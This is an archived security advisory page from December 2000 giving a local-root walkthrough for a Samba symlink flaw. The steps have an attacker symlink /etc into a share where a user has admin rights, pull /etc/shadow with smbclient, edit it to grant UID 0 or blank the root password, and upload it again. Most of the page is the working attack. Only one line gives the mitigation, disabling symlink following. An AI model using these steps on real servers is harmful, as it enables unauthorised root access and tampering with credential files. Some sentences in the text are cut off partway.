[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Symlink attack in (all?) Samba

Title: Symlink attack in (all?) Samba
Released by: Tozz
Date: 14th December 2000
Printable version: Click here
Symlink attack in (all?) Samba. - Local root walkthrough by Tozz



* Shell access or any other way to create symlinks

* A running samba deamon

* The username and/or password of a user named in the

  admin lists in one or more shares.

* Brains are not required.

By default, Samba (http://www.samba.org) followes symlinks, which can lead


root promises. Here is an example:

I have a guy that sorts out all my uploads through SMB, he has 'admin'


(admin users = username).. This means he will work as UID 0 (root).

e.g. we have this share in /etc/smb.conf


 path = /home/ftp/incoming

 comment = Uploads that came through anon ftp

 guest ok = no

 writeable = no

 force create mode = 0755

 force directory mode = 0755

 admin users = warezmaster

Login to the shell, or find some other way to create symlinks

and create a symlink in /home/ftp/incoming

you do something like

ln /etc -s

now type on you're box (local or remote works both):

smbclient file://foobar.com/uploads -U warezmaster

it will ask for a password, enter it and you will get something like


There we go

smb\:>cd etc

smb\:>get shadow


[root@embrace /root]

now you downloaded the shadow file on you're localbox

edit it, change you're UID to 0, or remove the password

from the root account (no password required at logon)

login with smbclient again

smbclient file://foobar.com/uploads -U warezmaster

enter the password

and reupload

smb\:>cd etc

smb\:>put shadow


that's it, now login to the shell, if you changed you're own uid

you are now root. If you removed the password from root account

just su to it and you wont need a password.


The 'Follow Symlinks' can be turned off, but it's on by default.


Disable Follow Symlinks


Tozz (tozz@hackers4hackers.org)

You can contact me on AxeNet (irc.axenet.org channel #axenet).nickname: Tozz

or MemoServ me when I'm not online.

(C) 1999-2000 All rights reserved.